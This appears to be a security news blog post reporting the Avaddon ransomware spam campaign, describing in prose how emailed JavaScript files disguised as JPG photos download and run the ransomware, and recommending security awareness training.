Avaddon Ransomware

Avaddon Ransomware has come alive in a massive spam campaign targeting users worldwide.

Avaddon was launched at the beginning of this month and is actively recruiting hackers and malware distributors to spread the ransomware by any means possible.

As its first known attack, the Avaddon Ransomware is being distributed in a spam campaign reminiscent of February’s Nemty Ransomware Love Letter campaign.

In a wave of emails using subjects like “Your new photo?” or “Do you like my photo?” containing nothing but a winking smiley face, a JavaScript downloader for the Avaddon ransomware is being distributed.

Example Avaddon spam email
Example Avaddon spam email

The cybersecurity firm Appriver stated that the Phorphiex/Trik Botnet is distributing the malicious emails.

This campaign is not small, as AppRiver security researcher David Picket told us that they had blocked over 300,000 emails in just a short period.

Attached to these emails is a JavaScript file masquerading as a JPG photo with names like IMG123101.jpg.

Before you ask why someone would open a JavaScript file that was emailed to them, it is important to remember that Windows hides file extension by default, even though it is a known security risk.

That means to the recipient, it would just appear as a .jpg file, as shown  below.

JavaScript file displayed as a JPG
JavaScript file displayed as a JPG

When executed, the JS attachment will launch both a PowerShell and Bitsadmin command to download the Avaddon ransomware executable to the %Temp% folder and run it.

To avoid your users being taken in by these malicious emails, it’s recommended that employees be enrolled in Security Awareness Training, as two-thirds of employees received no training in the last year. This will dramatically help lower the likelihood of any successful attack.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s